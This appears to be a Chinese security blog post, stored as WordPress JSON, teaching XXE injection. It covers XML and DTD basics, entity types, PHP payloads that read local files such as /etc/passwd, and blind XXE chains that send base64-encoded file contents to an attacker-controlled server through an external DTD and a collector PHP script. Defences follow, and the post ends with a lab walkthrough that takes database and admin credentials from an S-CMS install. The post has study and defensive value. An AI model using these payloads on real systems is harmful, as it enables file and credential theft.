{"id":351,"date":"2021-12-31T22:45:40","date_gmt":"2021-12-31T14:45:40","guid":{"rendered":"https:\/\/www.langsasec.cn\/?p=351"},"modified":"2022-11-14T22:36:50","modified_gmt":"2022-11-14T14:36:50","slug":"xxe","status":"publish","type":"post","link":"https:\/\/blog.langsasec.cn\/index.php\/2021\/12\/31\/xxe\/","title":{"rendered":"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165"},"content":{"rendered":"<h3><span class=\"ez-toc-section\" id=\"%e4%bb%80%e4%b9%88%e6%98%afxxe\"><\/span>\u4ec0\u4e48\u662fXXE<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h4><span class=\"ez-toc-section\" id=\"%e6%a6%82%e8%bf%b0\"><\/span>\u6982\u8ff0<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>XXE\uff1aXML External Entity \u5373XML\u5916\u90e8\u5b9e\u4f53\u3002<\/p>\n<p><strong>\u653b\u51fb\u8005\u901a\u8fc7\u5411\u670d\u52a1\u5668\u6ce8\u5165\u6307\u5b9a\u7684xml\u5b9e\u4f53\u5185\u5bb9,\u4ece\u800c\u8ba9\u670d\u52a1\u5668\u6309\u7167\u6307\u5b9a\u7684\u914d\u7f6e\u8fdb\u884c\u6267\u884c\u3002<\/strong><br \/>\n<strong>\u4e5f\u5c31\u662f\u8bf4\u670d\u52a1\u7aef\u63a5\u6536\u548c\u89e3\u6790\u4e86\u6765\u81ea\u7528\u6237\u7aef\u7684xml\u6570\u636e,\u800c\u53c8\u6ca1\u6709\u505a\u4e25\u683c\u7684\u5b89\u5168\u63a7\u5236,\u4ece\u800c\u5bfc\u81f4xml\u5916\u90e8\u5b9e\u4f53\u6ce8\u5165\u3002<\/strong><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%e7%8e%b0%e5%86%b5\"><\/span>\u73b0\u51b5<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u73b0\u5728\u5f88\u591a\u8bed\u8a00\u91cc\u9762\u5bf9\u5e94\u7684\u89e3\u6790xml\u7684\u51fd\u6570\u9ed8\u8ba4\u662f\u7981\u6b62\u89e3\u6790\u5916\u90e8\u5b9e\u4f53\u5185\u5bb9\u7684,\u4ece\u800c\u4e5f\u5c31\u76f4\u63a5\u907f\u514d\u4e86\u8fd9\u4e2a\u6f0f\u6d1e\u3002<br \/>\n\u4ee5PHP\u4e3a\u4f8b,\u5728PHP\u91cc\u9762\u89e3\u6790xml\u7528\u7684\u662flibxml,\u5176\u5728\u22652.9.0\u7684\u7248\u672c\u4e2d,\u9ed8\u8ba4\u662f\u7981\u6b62\u89e3\u6790xml\u5916\u90e8\u5b9e\u4f53\u5185\u5bb9\u7684\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%e4%bb%80%e4%b9%88%e6%98%afxml\"><\/span>\u4ec0\u4e48\u662fXML<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>XML \u6307\u53ef\u6269\u5c55\u6807\u8bb0\u8bed\u8a00\uff08EXtensible Markup Language\uff09<\/li>\n<li>XML \u662f\u4e00\u79cd\u6807\u8bb0\u8bed\u8a00\uff0c\u5f88\u7c7b\u4f3c HTML<\/li>\n<li>XML \u7684\u8bbe\u8ba1\u5b97\u65e8\u662f\u4f20\u8f93\u6570\u636e\uff0c\u800c\u975e\u663e\u793a\u6570\u636e<\/li>\n<li>XML \u6807\u7b7e\u6ca1\u6709\u88ab\u9884\u5b9a\u4e49\u3002\u60a8\u9700\u8981\u81ea\u884c\u5b9a\u4e49\u6807\u7b7e\u3002<\/li>\n<li>XML \u88ab\u8bbe\u8ba1\u4e3a\u5177\u6709\u81ea\u6211\u63cf\u8ff0\u6027\u3002<\/li>\n<li>XML \u662f W3C \u7684\u63a8\u8350\u6807\u51c6<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"dtd%e5%ad%a6%e4%b9%a0\"><\/span>DTD\u5b66\u4e60<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><strong>\u6587\u6863\u7c7b\u578b\u5b9a\u4e49\uff08DTD\uff09\u53ef\u5b9a\u4e49\u5408\u6cd5\u7684XML\u6587\u6863\u6784\u5efa\u6a21\u5757\u3002\u5b83\u4f7f\u7528\u4e00\u7cfb\u5217\u5408\u6cd5\u7684\u5143\u7d20\u6765\u5b9a\u4e49\u6587\u6863\u7684\u7ed3\u6784\u3002<\/strong><\/p>\n<p><strong>DTD \u53ef\u88ab\u6210\u884c\u5730\u58f0\u660e\u4e8e XML \u6587\u6863\u4e2d\uff0c\u4e5f\u53ef\u4f5c\u4e3a\u4e00\u4e2a\u5916\u90e8\u5f15\u7528\u3002<\/strong><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">\u5f15\u7528\u65b9\u5f0f\uff1a\n\n1.DTD \u5185\u90e8\u58f0\u660e\n&lt;!DOCTYPE \u6839\u5143\u7d20 [\u5143\u7d20\u58f0\u660e]&gt;\n\n2.DTD \u5916\u90e8\u5f15\u7528\n&lt;!DOCTYPE \u6839\u5143\u7d20\u540d\u79f0 SYSTEM \u201c\u5916\u90e8DTD\u7684URI\u201d&gt;\n\n3.\u5f15\u7528\u516c\u5171DTD\n&lt;!DOCTYPE \u6839\u5143\u7d20\u540d\u79f0 PUBLIC \u201cDTD\u6807\u8bc6\u540d\u201d \u201c\u516c\u7528DTD\u7684URI\u201d&gt;<\/code><\/pre>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/www.w3school.com.cn\/dtd\/dtd_intro.asp\">https:\/\/www.w3school.com.cn\/dtd\/dtd_intro.asp<\/a><\/p>\n<p><em>\u5b9a\u4e49\u5b9e\u4f53\u5fc5\u987b\u5199\u5728DTD\u90e8\u5206<\/em><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%e7%89%b9%e7%82%b9\"><\/span>\u7279\u70b9<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ol>\n<li>XML\u4ec5\u4ec5\u662f\u7eaf\u6587\u672c\uff0c\u4ed6\u4e0d\u4f1a\u505a\u4efb\u4f55\u4e8b\u60c5\u3002<\/li>\n<li>XML\u53ef\u4ee5\u81ea\u5df1\u53d1\u660e\u6807\u7b7e\uff08\u5141\u8bb8\u5b9a\u4e49\u81ea\u5df1\u7684\u6807\u7b7e\u548c\u6587\u6863\u7ed3\u6784\uff09<\/li>\n<li>XML \u662f\u5404\u79cd\u5e94\u7528\u7a0b\u5e8f\u4e4b\u95f4\u8fdb\u884c\u6570\u636e\u4f20\u8f93\u7684\u6700\u5e38\u7528\u7684\u5de5\u5177\uff0c\u5e76\u4e14\u5728\u4fe1\u606f\u5b58\u50a8\u548c\u63cf\u8ff0\u9886\u57df\u53d8\u5f97\u8d8a\u6765\u8d8a\u6d41\u884c\u3002<\/li>\n<\/ol>\n<h4><span class=\"ez-toc-section\" id=\"xxe%e5%8e%9f%e7%90%86\"><\/span>XXE\u539f\u7406<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u4ee5PHP\u4e3a\u4f8b<\/p>\n<p>php\u4e2d\u5b58\u5728\u4e00\u4e2a\u53eb\u505asimplexml_load_string\u7684\u51fd\u6570\uff08\u7528\u6765\u5904\u7406XML\uff09\uff0c\u8fd9\u4e2a\u51fd\u6570\u662f\u5c06XML\u8f6c\u5316\u4e3a\u5bf9\u8c61\u3002<br \/>\n\u5b9e\u4f8b\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?php\n$test = &#039;&lt;!DOCTYPE scan [&lt;!ENTITY test SYSTEM &quot;file:\/\/\/c:\/1.txt&quot;&gt;]&gt;&lt;scan&gt;&amp;test;&lt;\/scan&gt;&#039;;\n$obj = simplexml_load_string($test, &#039;SimpleXMLElement&#039;, LIBXML_NOENT);\nprint_r($obj);\n?&gt;\n\n#\u53d8\u91cftest\u91cc\u9762\u662fXML\n#\u7528simplexml_load_string\u5c06\u5176\u8f6c\u5316\u4e3a\u5bf9\u8c61\uff0c\u7b2c\u4e00\u4e2a\u53c2\u6570\u662fxml\u8bed\u53e5\uff0cSimpleXMLElement\u662f\u8c03\u7528\u4e86SimpleXMLElement\u8fd9\u4e2a\u7c7b\uff0c\u7136\u540eLIBXML_NOENT\u662f\u66ff\u4ee3\u5b9e\u4f53\uff0c\u7136\u540e\u4ed6\u53bb\u6267\u884c\u4e86file\u534f\u8bae\u53bb\u8bfb\u53d6\u6211\u7684\u6587\u4ef6<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"entity\"><\/span>ENTITY<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>XML\u4e2d\u7684\u5b9e\u4f53\u7c7b\u578b\uff0c\u4e00\u822c\u6709\u4e0b\u9762\u51e0\u79cd\uff1a\u547d\u540d\u5b9e\u4f53\uff08\u6216\u5185\u90e8\u5b9e\u4f53\uff09\u3001\u5916\u90e8\u666e\u901a\u5b9e\u4f53\u3001\u5916\u90e8\u53c2\u6570\u5b9e\u4f53\u3002\u9664\u5916\u90e8\u53c2\u6570\u5b9e\u4f53\u5916\uff0c\u5176\u5b83\u5b9e\u4f53\u90fd\u4ee5\u5b57\u7b26\uff08&amp;\uff09\u5f00\u59cb\uff0c\u4ee5\u5b57\u7b26\uff08;\uff09\u7ed3\u675f\u3002<br \/>\n<strong>1.\u5185\u90e8\u5b9e\u4f53<\/strong><br \/>\n\u4e00\u822c\u7528\u4e8e\u53d8\u91cf\u58f0\u660e<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;!ENTITY \u5b9e\u4f53\u540d\u79f0 &quot;\u5b9e\u4f53\u7684\u503c&quot;&gt;<\/code><\/pre>\n<p>\u5982\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;!DOCTYPE root [\n    &lt;!ENTITY x &quot;Hello&quot;&gt;\n    &lt;!ENTITY y &quot;World!&quot;&gt;\n]&gt;\n&lt;root&gt;&lt;x&gt;&amp;x;&lt;\/x&gt;&lt;y&gt;&amp;y;&lt;\/y&gt;&lt;\/root&gt;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/d9bcf84793b29d92dbaa119edea0d7c6.png\" alt=\"\u5c4f\u5e55\u5feb\u7167 2018-10-09 \u4e0b\u53485.49.34\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe\" \/><\/p>\n<p><strong>2.\u5916\u90e8\u666e\u901a\u5b9e\u4f53<\/strong><br \/>\n\u4e00\u822c\u7528\u4e8e\u52a0\u8f7d\u5916\u90e8\u6587\u4ef6\uff0c\u4e0d\u540c\u7a0b\u5e8f\u652f\u6301\u7684\u534f\u8bae\u4e0d\u4e00\u6837\u3002\u8fd9\u91cc\u6211\u4eec\u5c31\u53ef\u4ee5\u5229\u7528\u4e0d\u540c\u534f\u8bae\u6765\u8fbe\u5230\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\/\u5185\u7f51\u63a2\u6d4b\u7b49\u3002<br \/>\n<img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/b0be5a0bbad1879819b7095577c11737.png\" alt=\"\u5c4f\u5e55\u5feb\u7167 2018-10-09 \u4e0b\u53485.51.39\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe1\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;!ENTITY \u5b9e\u4f53\u540d\u79f0 SYSTEM &quot;URI\/URL&quot;&gt;<\/code><\/pre>\n<p>\u5982\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">php&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;!DOCTYPE root [\n    &lt;!ENTITY x &quot;First Param!&quot;&gt;\n    &lt;!ENTITY y &quot;Second Param!&quot;&gt;\n    &lt;!ENTITY xxe SYSTEM &quot;file:\/\/\/etc\/passwd&quot;&gt;\n]&gt;\n&lt;root&gt;&lt;x&gt;&amp;x;&lt;\/x&gt;&lt;y&gt;&amp;y;&lt;\/y&gt;&lt;xxe&gt;&amp;xxe;&lt;\/xxe&gt;&lt;\/root&gt;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/035eb4388b72a8d65adec7a0fd70f333.png\" alt=\"\u5c4f\u5e55\u5feb\u7167 2018-10-09 \u4e0b\u53486.00.55\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe2\" \/><\/p>\n<p><strong>3.\u5916\u90e8\u53c2\u6570\u5b9e\u4f53<\/strong><br \/>\n\u53c2\u6570\u5b9e\u4f53\u7528\u4e8eDTD\u548c\u6587\u6863\u7684\u5185\u90e8\u5b50\u96c6\u4e2d\u3002\u4e0e\u4e00\u822c\u5b9e\u4f53\u4e0d\u540c\uff0c\u662f\u4ee5\u5b57\u7b26\uff08%\uff09\u5f00\u59cb\uff0c\u4ee5\u5b57\u7b26\uff08;\uff09\u7ed3\u675f\u3002\u53ea\u6709\u5728DTD\u6587\u4ef6\u4e2d\u624d\u80fd\u5728\u53c2\u6570\u5b9e\u4f53\u58f0\u660e\u7684\u65f6\u5019\u5f15\u7528\u5176\u4ed6\u5b9e\u4f53\u3002\u9664\u4e86\u53ef\u4ee5\u5b8c\u6210\u6709\u56de\u663e\u7684\u60c5\u51b5\u3002\u8fd9\u91cc\u8fd8\u53ef\u4ee5\u7528\u4e8eBlind XXE\u653b\u51fb\u3002<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;!ENTITY % \u5b9e\u4f53\u540d\u79f0 &quot;\u5b9e\u4f53\u7684\u503c&quot;&gt;\n\u6216\u8005\n&lt;!ENTITY % \u5b9e\u4f53\u540d\u79f0 SYSTEM &quot;URI&quot;&gt;<\/code><\/pre>\n<p>\u5982\uff08Blind XXE\uff09\uff1a<br \/>\n\u7531\u4e8e\u8bed\u6cd5\u9650\u5236\u6240\u4ee5\u6211\u4eec\u9700\u8981\u5728\u5916\u90e8DTD\u4e2d\u63a5\u53d7\u5bf9\u5e94\u53c2\u6570<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;!DOCTYPE root [\n    &lt;!ENTITY % file SYSTEM &quot;file:\/\/\/Users\/ruilin\/test\/flag&quot;&gt;\n    &lt;!ENTITY % dtd SYSTEM &quot;http:\/\/rui0.cn\/test\/evil.dtd&quot;&gt;\n    %dtd;\n    %send;\n]&gt;<\/code><\/pre>\n<p>evil.dtd \u5185\u90e8\u7684%\u53f7\u8981\u8fdb\u884c\u5b9e\u4f53\u7f16\u7801\u6210&amp;#x25<br \/>\n\uff08\u8fd9\u91cc\u7684http:\/\/127.0.0.1:8888\u5927\u5bb6\u53ef\u4ee5\u7406\u89e3\u4e3a\u81ea\u5df1VPS\uff0c\u6211\u8fd9\u91cc\u4e3a\u4e86\u65b9\u4fbf\u76f4\u63a5\u4f7f\u7528\u672c\u673a\u63a5\u6536\u8bfb\u53d6\u5185\u5bb9\uff09<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;!ENTITY % all\n&quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#039;http:\/\/127.0.0.1:8888\/?file=%file;&#039;&gt;&quot;\n>\n%all;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/254a9de7c05d5231d3ec75de63ab178d.png\" alt=\"\u5c4f\u5e55\u5feb\u7167 2018-10-09 \u4e0b\u53487.06.04\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe3\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"xxe%e5%8d%b1%e5%ae%b3\"><\/span>XXE\u5371\u5bb3<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>XXE\uff08XML\u5916\u90e8\u5b9e\u4f53\u6ce8\u5165\uff0cXML External Entity) \uff0c\u5728\u5e94\u7528\u7a0b\u5e8f<strong>\u89e3\u6790<\/strong>XML\u8f93\u5165\u65f6\uff0c\u5f53<strong>\u5141\u8bb8\u5f15\u7528\u5916\u90e8\u5b9e\u4f53<\/strong>\u65f6\uff0c\u53ef\u6784\u9020\u6076\u610f\u5185\u5bb9\uff0c\u5bfc\u81f4<\/p>\n<ul>\n<li>\n<p>\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6<\/p>\n<p>\u8bfb\u53d6\u6570\u636e\u65e0\u56de\u663e\uff0c\u53ef\u4ee5\u628a\u6570\u636e\u53d1\u9001\u5230\u8fdc\u7a0b\u670d\u52a1\u5668\u3002<\/p>\n<\/li>\n<li>\n<p>\u63a2\u6d4b\u5185\u7f51\u7aef\u53e3<\/p>\n<\/li>\n<li>\n<p>\u653b\u51fb\u5185\u7f51\u7f51\u7ad9<\/p>\n<\/li>\n<li>\n<p>\u53d1\u8d77DoS\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/p>\n<\/li>\n<li>\n<p>\u6267\u884c\u7cfb\u7edf\u547d\u4ee4<\/p>\n<\/li>\n<\/ul>\n<p>\u7b49\u3002Java\u4e2d\u7684XXE\u652f\u6301<code>sun.net.www.protocol<\/code> \u91cc\u7684\u6240\u6709\u534f\u8bae\uff1ahttp\uff0chttps\uff0cfile\uff0cftp\uff0cmailto\uff0cjar\uff0cnetdoc\u3002\u4e00\u822c\u5229\u7528file\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6\uff0c\u5229\u7528http\u534f\u8bae\u63a2\u6d4b\u5185\u7f51\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%e8%af%bb%e5%8f%96%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e6%a1%88%e4%be%8b%e8%ae%b2%e8%a7%a3\"><\/span>\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\u6848\u4f8b\u8bb2\u89e3<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?php\n$test =&lt;&lt;&lt;EOF\n&lt;?xml version=&quot;1.0&quot;?&gt;\n&lt;!DOCTYPE ANY[\n&lt;!ENTITY % file SYSTEM &quot;php:\/\/filter\/read=convert.base64-encode\/resource=c:\/1.txt&quot;&gt;\n#\u5148\u8bfb\u53d6\u6211\u4eec\u60f3\u8981\u7684\u6587\u4ef6\uff0c\u7136\u540e\u4e3a\u4e86\u4f20\u8f93\u65b9\u4fbf\uff0c\u6211\u4eec\u5148\u6765\u4e2abase64\u7f16\u7801\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528php\u4f2a\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6\uff08\u4ec5PHP\u652f\u6301\uff09\n\n#\u8c03\u7528\u4e00\u4e2a\u5916\u90e8xml \n#\u6bd4\u59821.xml\n    #1.xml###################\n&lt;!ENTITY % remote SYSTEM &quot;http:\/\/192.168.32.146\/xxe\/1.xml&quot;&gt; \n&lt;!ENTITY % all\n  &quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#039;http:\/\/120.203.13.75:8123\/xxe\/2.php?id=%file;&#039;&gt;&quot;\n    #\u8bfb\u53d6\u51fa\u6765\u7684\u6587\u4ef6\u4f1a\u7528get\u4f20\u53c2\u7684\u65b9\u5f0f\u4f20\u53c2\u7ed92.php\n    &gt;\n    %all;\n    #1.xml###################\n\n#2.php\u5982\u4e0b  \n#&lt;?php file_put_contents(&quot;3.txt&quot;,$_GET[&quot;id&quot;],FILE_APPEND);?&gt;\n\n%remote;\n%send; \n]&gt;\nEOF;\n$obj = simplexml_load_string($test, &#039;SimpleXMLElement&#039;, LIBXML_NOENT);\n?&gt;\n<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"xxe%e9%98%b2%e5%be%a1\"><\/span>XXE\u9632\u5fa1<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u65b9\u6848\u4e00\u3001\u4f7f\u7528\u5f00\u53d1\u8bed\u8a00\u63d0\u4f9b\u7684\u7981\u7528\u5916\u90e8\u5b9e\u4f53\u7684\u65b9\u6cd5<\/p>\n<p>PHP\uff1a<br \/>\nlibxml_disable_entity_loader(true);<\/p>\n<p>JAVA:<br \/>\nDocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();<br \/>\ndbf.setExpandEntityReferences(false);<\/p>\n<p>Python\uff1a<br \/>\nfrom lxml import etree<br \/>\nxmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))<br \/>\n\u65b9\u6848\u4e8c\u3001\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684XML\u6570\u636e<br \/>\n\u5173\u952e\u8bcd\uff1a&lt;!DOCTYPE\u548c&lt;!ENTITY\uff0c\u6216\u8005\uff0cSYSTEM\u548cPUBLIC\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%e9%9d%b6%e5%9c%ba%e6%bc%94%e7%a4%ba\"><\/span>\u9776\u573a\u6f14\u793a<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u76ee\u7684\uff1a\u901a\u8fc7XXE\u6765\u627e\u5230\u7ba1\u7406\u5458\u8d26\u6237\u5bc6\u7801<\/p>\n<p>1.\u9776\u573a\u4e3a\u5f00\u6e90CMS\uff1a\u95ea\u7075\u4f01\u4e1a\u5efa\u7ad9\uff08S-CMS\uff09<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/0c78b6d2aeecf2f2edf493047bf4bbab.png\" alt=\"image-20211231214735541\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe4\" \/><\/p>\n<p>2.\u53ef\u4ee5\u76f4\u63a5\u5728\u627e\u6e90\u7801\u6765\u5206\u6790<\/p>\n<p>\u5728weixin\u6587\u4ef6\u5939\u4e0b\u627e\u5230\u4e86simplexml_load_string\u51fd\u6570\u3002<\/p>\n<p>\u5f53$signature\u4e0d\u4e3a\u7a7a\u76f4\u63a5\u5c06POST\u63d0\u4ea4\u4e0a\u53bb\u7684\u6570\u636e\u653e\u5165\u4e86simplexml_load_string<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/f852b0631628af4888b005c889554e47.png\" alt=\"image-20211231221224900\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe5\" \/><\/p>\n<p>3.\u53ef\u60dc\u7684\u662f\u9875\u9762\u65e0\u663e\u793a\uff0c\u65e0\u6cd5\u6b63\u5e38\u7684\u4f7f\u7528XXE\u8f93\u51fa\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/0d13da6c93eaa03afd4e24dadcbc70a0.png\" alt=\"image-20211231221519942\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe6\" \/><\/p>\n<p>4.\u6211\u4eec\u9700\u8981\u5c1d\u8bd5\u53bb\u7528\u6ca1\u6709\u8f93\u51fa\u7684xxe\u653b\u51fb\u65b9\u6cd5\u3002<\/p>\n<p>\u5728\u67d0\u53f0\u516c\u7f51\u670d\u52a1\u5668\u4e0a\u7559\u4e0b1.xml,\u4ee5\u53ca2.php\u8fd8\u67093.txt\u7528\u6765\u63a5\u6536\u6570\u636e\u3002\uff08\u5177\u4f53\u539f\u7406\u89c1\u4e0a\u6587\u7684\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\u6848\u4f8b\u8bb2\u89e3\uff09<\/p>\n<p>5.\u6211\u4eec\u53ea\u9700\u8981\u8bfb\u53d6\u6587\u4ef6\u7136\u540e\u5f15\u75281.xml\uff0c1.xml\u4f1a\u5c06\u8bfb\u53d6\u6587\u4ef6\u7684\u5185\u5bb9\u53d1\u9001\u7ed92.php\u30022.php\u7684\u6570\u636e\u4f1a\u50a8\u5b58\u52303.txt\u3002<\/p>\n<p>6.\u6211\u4eec\u9700\u8981\u7ba1\u7406\u5458\u8d26\u6237\uff0c\u6240\u4ee5\u5728CMS\u6e90\u7801\u627e\u5230\u4e86conn\/conn.php\u91cc\u6709\u6570\u636e\u5e93\u5bc6\u7801\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/ddd9653fe08ee8fc05a11c32ca5a4fc6.png\" alt=\"image-20211231222600124\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe7\" \/><\/p>\n<p>7.\u901a\u8fc7XXE\u6765\u83b7\u53d6\u4fe1\u606f<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/a3dcacf4d228bec90e40a600a1156181.png\" alt=\"image-20211231223020199\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe8\" \/><\/p>\n<p>8.\u57283.txt\u4e2d\u6536\u5230\u4e86\u4fe1\u606f\uff0c\u53bb\u89e3\u5bc6\u4e00\u4e0b<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/b7907ecd7d940f5769e6a51b8d4141be.png\" alt=\"image-20211231223128126\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe9\" \/><\/p>\n<p>9.\u62ff\u5230\u6570\u636e\u5e93\u8d26\u6237\u5bc6\u7801\uff0c\u53bb\u767b\u9646\u6570\u636e\u5e93<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/980804d001195efad36e670f28028446.png\" alt=\"image-20211231223748504\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe10\" \/><\/p>\n<p>10.\u62ff\u5230\u7ba1\u7406\u5458\u5bc6\u7801\uff0c\u6536\u5de5\uff01<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/a03ab78747154fc219ac55592d26f5f1.png\" alt=\"image-20211231223935275\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe11\" \/><\/p>\n<p>\u672c\u6587\u6db5\u76d6\u53c2\u8003\u94fe\u63a5\uff1a<\/p>\n<ul>\n<li><a href=\"http:\/\/rui0.cn\/archives\/993\">http:\/\/rui0.cn\/archives\/993<\/a><\/li>\n<li><a href=\"https:\/\/skysec.top\/2018\/08\/17\/%E6%B5%85%E6%9E%90xml%E5%8F%8A%E5%85%B6%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98\/\">https:\/\/skysec.top\/2018\/08\/17\/%E6%B5%85%E6%9E%90xml%E5%8F%8A%E5%85%B6%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98\/<\/a><\/li>\n<li><a href=\"https:\/\/blog.csdn.net\/qq_40491569\/article\/details\/83066200\">https:\/\/blog.csdn.net\/qq_40491569\/article\/details\/83066200<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u4ec0\u4e48\u662fXXE \u6982\u8ff0 XXE\uff1aXML External Entity \u5373XML\u5916\u90e8\u5b9e\u4f53\u3002 \u653b\u51fb\u8005\u901a\u8fc7\u5411\u670d\u52a1\u5668\u6ce8\u5165 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":927,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,19],"tags":[],"class_list":["post-351","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-webpt-studynote","category-penetration-test"],"_links":{"self":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/comments?post=351"}],"version-history":[{"count":8,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/351\/revisions"}],"predecessor-version":[{"id":1067,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/351\/revisions\/1067"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media\/927"}],"wp:attachment":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media?parent=351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/categories?post=351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/tags?post=351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}